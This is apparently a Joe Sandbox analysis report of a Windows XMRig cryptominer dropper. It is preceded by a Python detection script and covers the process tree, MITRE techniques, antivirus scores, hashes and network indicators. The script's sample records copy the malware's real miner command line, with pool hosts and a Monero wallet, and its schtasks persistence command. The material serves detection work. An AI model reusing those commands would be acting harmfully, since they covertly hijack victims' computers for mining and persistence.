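The process listing above carries the three things a detection engineer would key on: a Windows shell binary (explorer.exe) launched with XMRig arguments (pool endpoints on port 8080, a 95-character Monero address in --user), a schtasks /create whose /tr points into AppData\Local\Temp, and conhost.exe acting as the parent of cmd.exe, sihost64.exe and explorer.exe, which an unhollowed conhost never does. The example below, added here and not Joe Sandbox or XMRig code, runs those three rules over constructed process-creation records. The command lines in the first two records are copied from this report; the record field names (Image, ParentImage, CommandLine, in the style of Sysmon event 1), the rule names and the benign baseline record are assumptions made for the demonstration.

```python
"""Flag the XMRig launch pattern from this report in process-creation telemetry.

Added example for this report, not Joe Sandbox or XMRig code. The two malicious
records reuse the report's command lines; the record layout, rule names and
benign baseline are assumptions. Tokenising splits on whitespace, which is
enough for the report's command lines but not for quoted paths with spaces.
"""
import re
from dataclasses import dataclass

# Options XMRig accepts that a Windows shell binary has no reason to carry.
MINER_FLAGS = {"--url", "-o", "--algo", "--asm", "--user", "--pass", "--randomx-mode",
               "--cpu-max-threads-hint", "--cinit-idle-wait"}
# Monero standard address: '4' followed by 94 base58 characters.
MONERO_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")
ENDPOINT = re.compile(r"^(?:stratum\+(?:tcp|ssl)://)?([A-Za-z0-9.\-]+):(\d{1,5})$")
SYSTEM_IMAGES = {"explorer.exe", "conhost.exe", "svchost.exe", "sihost.exe"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    detail: str


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _tokens(cmdline):
    # Drop the quoting the sandbox rendered as single quotes around values.
    return [t.strip("'\"") for t in cmdline.split()]


def miner_iocs(cmdline):
    """Return (pool endpoints, Monero wallet or None) from an XMRig-style command line."""
    toks = _tokens(cmdline)
    pools, wallet, i = [], None, 0
    while i < len(toks):
        key, _, val = toks[i].partition("=")
        if key in ("--url", "-o", "--user", "-u") and not val and i + 1 < len(toks):
            val = toks[i + 1]            # space-separated form: -o host:port
            i += 1
        if key in ("--url", "-o") and ENDPOINT.match(val):
            pools.append(val)
        elif key in ("--user", "-u") and MONERO_ADDR.match(val):
            wallet = val
        i += 1
    return pools, wallet


def detect(event):
    """Apply the three rules to one process-creation record."""
    image = _basename(event["Image"])
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    toks = _tokens(cmd)
    out = []

    flags = {t.partition("=")[0] for t in toks} & MINER_FLAGS
    pools, wallet = miner_iocs(cmd)
    if pools or wallet or len(flags) >= 3:
        sev = "high" if image in SYSTEM_IMAGES else "medium"
        out.append(Finding("xmrig_cmdline", image, f"{sev}: pools={pools} wallet={wallet}"))

    if image == "schtasks.exe":
        low = [t.lower() for t in toks]
        if "/create" in low:
            tr = next((low[i + 1] for i, t in enumerate(low[:-1]) if t == "/tr"), "")
            if any(w in tr for w in USER_WRITABLE):
                out.append(Finding("schtasks_userwritable", image, tr))

    if parent == "conhost.exe" and image != "conhost.exe":
        out.append(Finding("conhost_spawns_child", image, f"parent={parent}"))
    return out


def scan(events):
    return [f for e in events for f in detect(e)]


SAMPLE_EVENTS = [
    {   # report: explorer.exe started by the hollowed conhost.exe with miner arguments
        "Image": r"C:\Windows\explorer.exe",
        "ParentImage": r"C:\Windows\System32\conhost.exe",
        "CommandLine": r"C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto "
                       r"--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr "
                       r"--cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 "
                       r"-o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 "
                       r"--user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ "
                       r"--pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100",
    },
    {   # report: the persistence command
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"schtasks /create /f /sc onlogon /rl highest /tn 'services64' "
                       r"/tr 'C:\Users\user\AppData\Local\Temp\services64.exe'",
    },
    {   # constructed benign baseline: the shell started normally at logon
        "Image": r"C:\Windows\explorer.exe",
        "ParentImage": r"C:\Windows\System32\userinit.exe",
        "CommandLine": r"C:\Windows\Explorer.EXE",
    },
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.rule, f.image, f.detail)
```

The pool list and wallet that `miner_iocs` extracts are the blockable artefacts: the four endpoints feed a network block list, and the wallet is the pivot for linking other samples from the same campaign.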

Mitre Att&ck Matrix

The matrix is listed per tactic below. Techniques carrying a trailing count are the ones matched by this report's signatures; the rest are the matrix's fixed grid.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation 1; Command and Scripting Interpreter 1; Scheduled Task/Job 1; At (Windows); Cron; Launchd
Persistence: Windows Service 1; Scheduled Task/Job 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Windows Service 1; Process Injection 712; Scheduled Task/Job 1; Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Masquerading 1; Virtualization/Sandbox Evasion 111; Process Injection 712; Obfuscated Files or Information 1; Software Packing; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery 21; Process Discovery 1; Virtualization/Sandbox Evasion 111; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 12
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel 1; Non-Standard Port 1; Non-Application Layer Protocol 1; Application Layer Protocol 1; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

              Behavior Graph

Behavior Graph ID: 513056, Sample: pcNCraWcRk, Start date: 01/11/2021, Architecture: WINDOWS, Score: 100

Process tree and per-node signatures recovered from the graph (the graph itself is an image):

Start node: xmr.givemexyz.in (DNS). Signatures: Sigma detected: Xmrig; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 6 other signatures.
  pcNCraWcRk.exe (started). Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection).
    conhost.exe (started). Dropped: C:\Users\user\AppData\...\services64.exe (PE32+); C:\Users\...\services64.exe:Zone.Identifier (ASCII).
      cmd.exe (started)
        services64.exe (started). Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection).
          conhost.exe (started). Dropped: C:\Users\user\AppData\Roaming\...\WR64.sys (PE32+). Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes.
            explorer.exe (started). Network: 198.23.214.117 (ports 49763, 8080), AS-COLOCROSSINGUS, United States, with signature Detected Stratum mining protocol; DNS: xmr.givemexyz.in. Signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs).
        conhost.exe (started)
      cmd.exe (started). Signatures: Uses schtasks.exe or at.exe to add and modify task schedules.
        conhost.exe (started)
        schtasks.exe (started)
  services64.exe (started). Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file.
    conhost.exe (started). Dropped: C:\Users\user\AppData\...\sihost64.exe (PE32+). Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures.
      sihost64.exe (started). Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; 2 other signatures.
        conhost.exe (started)
      explorer.exe (started)


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
pcNCraWcRk.exe | 65% | Virustotal |
pcNCraWcRk.exe | 31% | Metadefender |
pcNCraWcRk.exe | 81% | ReversingLabs | Win64.Trojan.Donut
pcNCraWcRk.exe | 100% | Avira | TR/Agent.wbqui

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 100% | Avira | TR/Agent.ywcqa
C:\Users\user\AppData\Local\Temp\services64.exe | 100% | Avira | TR/Agent.wbqui
C:\Users\user\AppData\Local\Temp\services64.exe | 65% | Virustotal |
C:\Users\user\AppData\Local\Temp\services64.exe | 31% | Metadefender |
C:\Users\user\AppData\Local\Temp\services64.exe | 81% | ReversingLabs | Win64.Trojan.Donut
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 1% | Virustotal |
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 3% | Metadefender |
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 4% | ReversingLabs |
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 49% | Metadefender |
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 82% | ReversingLabs | Win64.Trojan.Donut

              Unpacked PE Files

Source | Detection | Scanner | Label
17.0.explorer.exe.140000000.12.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.6.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.2.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.0.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.11.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.8.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.1.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.4.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.7.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.12.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.13.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.8.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.7.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.5.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.9.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.10.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.0.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.6.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.1.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.13.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.10.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.3.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.9.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.11.unpack | 100% | Avira | HEUR/AGEN.1134782
18.0.explorer.exe.140000000.2.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.5.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.4.unpack | 100% | Avira | HEUR/AGEN.1134782
17.0.explorer.exe.140000000.3.unpack | 100% | Avira | HEUR/AGEN.1134782

              Domains

Source | Detection | Scanner | Label
xmr.givemexyz.in | 16% | Virustotal |

              URLs

Source | Detection | Scanner | Label
https://xmrig.com/benchmark/%s | 0% | URL Reputation | safe
https://xmrig.com/wizard | 0% | URL Reputation | safe
https://xmrig.com/wizard%s | 0% | URL Reputation | safe
https://xmrig.com/docs/algorithms | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
xmr.givemexyz.in | 212.114.52.24 | true | true | | unknown

              URLs from Memory and Binaries

Name: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://xmrig.com/wizard
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000001.00000002.685200138.0000025F60DC1000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: none
Reputation: high

Name: https://xmrig.com/wizard%s
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

                Contacted IPs


                Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.23.214.117 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

                General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 513056
Start date: 01.11.2021
Start time: 18:19:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 29s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: pcNCraWcRk (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.mine.winEXE@26/6@2/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 63.1% (good quality ratio 52.4%)
• Quality average: 41.6%
• Quality standard deviation: 27.2%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.209.183, 8.248.119.254, 8.238.85.254, 8.248.137.254, 8.241.126.249, 8.248.99.254, 173.222.108.147, 173.222.108.226
                • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, arc.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net
• Not all processes were analyzed; the report is missing behavior information

                Simulations

                Behavior and APIs

Time | Type | Description
18:20:03 | API Interceptor | 1x Sleep call for process: pcNCraWcRk.exe modified
18:20:07 | API Interceptor | 4x Sleep call for process: conhost.exe modified
18:20:09 | Task Scheduler | Run new task: services64 path: C:\Users\user\AppData\Local\Temp\services64.exe
18:20:10 | API Interceptor | 2x Sleep call for process: services64.exe modified
18:20:13 | API Interceptor | 1x Sleep call for process: sihost64.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

Match | Associated Sample Name / URL | Detection | Context
xmr.givemexyz.in | oracleservice.exe | malicious | 212.114.52.24
xmr.givemexyz.in | nazi.exe | malicious | 194.5.249.24

                ASN

Match | Associated Sample Name / URL | Detection | Context
AS-COLOCROSSINGUS | Announcement.xlsx | malicious | 198.46.132.212
AS-COLOCROSSINGUS | Swift Transfer - Failure.xlsx | malicious | 192.227.158.116
AS-COLOCROSSINGUS | Inquiry files_00123.xlsx | malicious | 198.23.213.2
AS-COLOCROSSINGUS | flv0110121.xlsx | malicious | 198.23.213.2
AS-COLOCROSSINGUS | Document.exe | malicious | 107.175.32.198
AS-COLOCROSSINGUS | Booking.xlsx | malicious | 107.172.75.205
AS-COLOCROSSINGUS | SHIPPPING-DOC.xlsx | malicious | 198.46.199.161
AS-COLOCROSSINGUS | xE9 Players Full Profiles.xlsx | malicious | 198.46.199.161
AS-COLOCROSSINGUS | RFQ DTD011121- FAMORITALIA.xlsx | malicious | 107.173.191.112
AS-COLOCROSSINGUS | NEW ORDER (001) P000000000000 D02.xlsx | malicious | 192.227.158.118
AS-COLOCROSSINGUS | scan_documents.xlsx | malicious | 107.172.75.205
AS-COLOCROSSINGUS | VuMhXFFSwX.exe | malicious | 23.94.183.146
AS-COLOCROSSINGUS | 4oPbyzyFDC.rtf | malicious | 192.227.228.38
AS-COLOCROSSINGUS | new order sheet 0016.xlsx | malicious | 198.23.212.136
AS-COLOCROSSINGUS | agreement.xlsx | malicious | 198.46.199.161
AS-COLOCROSSINGUS | SHIPPING DOCUMENT.xlsx | malicious | 198.46.199.161
AS-COLOCROSSINGUS | new oder sheet 0015.xlsx | malicious | 198.23.212.136
AS-COLOCROSSINGUS | Statement of Account for OCTOBER 2021pdf.exe | malicious | 23.95.115.74
AS-COLOCROSSINGUS | RPA Purchase Order.xlsx | malicious | 107.172.13.131
AS-COLOCROSSINGUS | 008.xlsx | malicious | 198.23.212.136

                JA3 Fingerprints

                No context

                Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | FreeForYou.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | A3aCLmM4IV.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Software patch by Silensix.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f1.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | sWSfbao3sR.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Fortnite Hack Mod v1.4.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | LauncherHack.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Hack.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | ixijzt2mxt.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | GTA5TerrorMM.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | FANDER_MOD V3.03.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Injector.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Injector.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 61BoDeKl0u.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | ShinChangerFort.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | Sapphire.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | p5x6Tk5245.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | install.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | wpXW8288lr.exe | malicious
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | SecuriteInfo.com.Trojan.InjectNET.14.313.exe | malicious

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Process: C:\Windows\System32\conhost.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 539
Entropy (8bit): 5.348465763088588
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaDAWDLI4MWuCv:ML9E4Kr8sXE4+aE4Ks
MD5: AD3DC4BDB13FFE4ABD214A6EB4E5A519
SHA1: A2C3FCBCA3F40AE579E303AA8E8E2810860F088C
SHA-256: EEA4FDD5FA39D6145F4C5ABFB3BEB63C1D750B2BBA95D5D9D52F245AA07DC02D
SHA-512: 50E0046F80823EB299545C16DD4A027A6294CC74294AE12D9A40F62FB6F1E92319511E90486427F2FEE44E6BB3E1317EA582284FB6CD82CA1BE9B5F3614BBE12
Malicious: false
Reputation: moderate, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                        C:\Users\user\AppData\Local\Temp\services64.exe
Process: C:\Windows\System32\conhost.exe
File Type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 2234368
Entropy (8bit): 7.999681283638092
Encrypted: true
SSDEEP: 24576:1drStRzAeuEl5IJw6mgjogJlV50mtIJfBaH1NUqGCnW1lm/SIwDIGPvarynWZqJ3:LGRUEIRPlVydBLCelDI1m0yBJSXM/nP
MD5: 0958FA69BA0E6645C42215C5325D8F76
SHA1: 800666827E118CE78AEF55C47864512EF9D3B7A6
SHA-256: 1B0C9F3F22D25CD518E480798EE44E8876107B2D37B2E92997C039D4A6C69DB1
SHA-512: 95F582F9B45325951FE4CDC40CD5AE1037A955E437C052C64186641785F8170C7C9CB9532756166E267F0398217991C616AD86115EBB8D0B183898887950CC28
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Virustotal, Detection: 65%
• Antivirus: Metadefender, Detection: 31%
• Antivirus: ReversingLabs, Detection: 81%
                                                        C:\Users\user\AppData\Local\Temp\services64.exe:Zone.Identifier
Process: C:\Windows\System32\conhost.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
                                                        C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Process: C:\Windows\System32\conhost.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 14544
Entropy (8bit): 6.2660301556221185
Encrypted: false
SSDEEP: 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5: 0C0195C48B6B8582FA6F6373032118DA
SHA1: D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256: 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512: AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious: true
Antivirus:
• Antivirus: Virustotal, Detection: 1%
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:
• Filename: FreeForYou.exe, Detection: malicious
• Filename: A3aCLmM4IV.exe, Detection: malicious
• Filename: Software patch by Silensix.exe, Detection: malicious
• Filename: 96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f1.exe, Detection: malicious
• Filename: sWSfbao3sR.exe, Detection: malicious
• Filename: Fortnite Hack Mod v1.4.exe, Detection: malicious
• Filename: LauncherHack.exe, Detection: malicious
• Filename: Hack.exe, Detection: malicious
• Filename: ixijzt2mxt.exe, Detection: malicious
• Filename: GTA5TerrorMM.exe, Detection: malicious
• Filename: FANDER_MOD V3.03.exe, Detection: malicious
• Filename: Injector.exe, Detection: malicious
• Filename: Injector.exe, Detection: malicious
• Filename: 61BoDeKl0u.exe, Detection: malicious
• Filename: ShinChangerFort.exe, Detection: malicious
• Filename: Sapphire.exe, Detection: malicious
• Filename: p5x6Tk5245.exe, Detection: malicious
• Filename: install.exe, Detection: malicious
• Filename: wpXW8288lr.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.InjectNET.14.313.exe, Detection: malicious
                                                        C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):31232
                                                        Entropy (8bit):7.562503947370134
                                                        Encrypted:false
                                                        SSDEEP:384:VBTkmAadBYV6qxjqoz9EFEJNsoZuKVAWIL47zbMluB8qywZfH2pUq:kqjhWN6Fayodnm47zbMluB8U2pU
                                                        MD5:2497F634A80476AE2EAE956D8B84528E
                                                        SHA1:37DC97DFDA569615F036C7B3F74732231C9772E7
                                                        SHA-256:91EFE614A81B0E8F15EF7814CEB90DA038E6FDA29AAB733E53D8E3B49706B9BE
                                                        SHA-512:228F42E993F4089223ECDA317DCED1C8274CBAE75667478F43D31F9CF39DF35F62BE19624E24C39E2D4980C3174E6ED4BB2214F0383491AF862BF4681FBDAD35
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                         • Antivirus: Metadefender, Detection: 49%
                                                        • Antivirus: ReversingLabs, Detection: 82%

                                                        Static File Info

                                                        General

                                                        File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                        Entropy (8bit):7.999681283638092
                                                        TrID:
                                                        • Win64 Executable (generic) (12005/4) 74.80%
                                                        • Generic Win/DOS Executable (2004/3) 12.49%
                                                        • DOS Executable Generic (2002/1) 12.47%
                                                        • VXD Driver (31/22) 0.19%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                        File name:pcNCraWcRk.exe
                                                        File size:2234368
                                                        MD5:0958fa69ba0e6645c42215c5325d8f76
                                                        SHA1:800666827e118ce78aef55c47864512ef9d3b7a6
                                                        SHA256:1b0c9f3f22d25cd518e480798ee44e8876107b2d37b2e92997c039d4a6c69db1
                                                        SHA512:95f582f9b45325951fe4cdc40cd5ae1037a955e437c052c64186641785f8170c7c9cb9532756166e267f0398217991c616ad86115ebb8d0b183898887950cc28
                                                        SSDEEP:24576:1drStRzAeuEl5IJw6mgjogJlV50mtIJfBaH1NUqGCnW1lm/SIwDIGPvarynWZqJ3:LGRUEIRPlVydBLCelDI1m0yBJSXM/nP

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4022fa
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:
                                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
